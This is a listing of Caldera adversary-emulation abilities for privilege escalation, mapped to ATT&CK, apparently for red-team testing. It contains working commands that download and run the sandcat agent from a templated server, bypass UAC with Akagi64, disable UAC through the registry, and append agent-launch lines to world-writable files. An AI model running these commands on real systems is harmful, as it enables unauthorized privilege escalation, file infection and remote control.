Caldera emulation abilities
8 runnable adversary-emulation actions · command + platform · mapped to ATT&CK
Abilities
privilege-escalation
[]
Abuse Linux Capability: Python3
Use python3 to pull down Caldera agent as root
[]
privilege-escalation
["windows"]
T1548.002 · Abuse Elevation Control Mechanism: Bypass User Access Control ↗
Bypass UAC Medium
Bypass user account controls - medium
[{"platform": "windows", "executor": "psh", "command": "$url=\"#{server}/file/download\"; $wc=New-Object System.Net.WebClient; $wc.Headers.add(\"platform\",\"windows\"); $wc.Headers.add(\"file\",\"sandcat.go\"); $data=$wc.DownloadData($url); $name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\"); [io.file]::WriteAllBytes(\"C:\\Users\\Public\\$name.exe\",$data);\n$job = Start-Job -ScriptBlock { Import-Module -Name .\\Bypass-UAC.ps1; Bypass-UAC -Command \"C:\\Users\\Public\\$name.exe -group #{group}\"; };\nReceive-Job -Job $job -Wait;\n"}]
privilege-escalation
[]
SUID Find & Exploit
Finds all SUID binaries and executes relevant commands
[]
privilege-escalation
["windows"]
T1548.002 · Abuse Elevation Control Mechanism: Bypass User Access Control ↗
Slui File Handler Hijack
Executes the slui.exe file handler hijack
[{"platform": "windows", "executor": "psh", "command": ".\\Akagi64.exe 45 C:\\Windows\\System32\\cmd.exe\n"}]
privilege-escalation
["windows"]
T1548.002 · Abuse Elevation Control Mechanism: Bypass User Access Control ↗
UAC bypass registry
Set a registry key to allow UAC bypass
[{"platform": "windows", "executor": "psh", "command": "New-ItemProperty -Path HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\policies\\system -Name EnableLUA -PropertyType DWord -Value 0 -Force\n"}]
privilege-escalation
["darwin", "linux"]
T1574.010 · Hijack Execution Flow: Services File Permissions Weakness ↗
Weak executable files
Locate and infect files with weak but executable permissions
[{"platform": "darwin", "executor": "sh", "command": "find / -type f -size -500k -maxdepth 5 -perm -333 2>/dev/null -exec sh -c 'grep -qF \"54NDC47_SCRIPT\" \"{}\" || echo \"#54NDC47_SCRIPT\\n\" \"chmod +x sandcat.go-darwin && sandcat.go-darwin\" >> \"{}\"; ls \"{}\" ' \\; | echo \"complete\"\n"}, {"platform": "linux", "executor": "sh", "command": "find / -type f -size -500k -maxdepth 5 -perm -333 2>/dev/null -exec sh -c 'grep -qF \"54NDC47_SCRIPT\" \"{}\" || echo \"#54NDC47_SCRIPT\\n\" \"chmod +x sandcat.go-linux && sandcat.go-linux\" >> \"{}\"; ls \"{}\" ' \\; | echo \"complete\"\n"}]
privilege-escalation
["windows"]
T1548.002 · Abuse Elevation Control Mechanism: Bypass User Access Control ↗
duser/osksupport DLL Hijack
UIPI bypass with uiAccess application
[{"platform": "windows", "executor": "psh", "command": "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"sandcat.go\");\n$wc.Headers.add(\"server\",\"#{server}\");\n$wc.Headers.add(\"defaultSleep\",\"60\");\n$wc.Headers.add(\"defaultGroup\",\"bypassed_u_bro\");\n$data=$wc.DownloadData($url);\n$name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\");\n[io.file]::WriteAllBytes(\"C:\\Users\\Public\\$name.exe\",$data);\n.\\Akagi64.exe 32 \"C:\\Users\\Public\\$name.exe -server #{server}\"\n"}]
privilege-escalation
["windows"]
T1548.002 · Abuse Elevation Control Mechanism: Bypass User Access Control ↗
wow64log DLL Hijack
DLL hijack of the WOW64 logger wow64log.dll using Akagi.exe
[{"platform": "windows", "executor": "cmd,psh", "command": ".\\Akagi64.exe 30 C:\\Windows\\System32\\cmd.exe\n"}]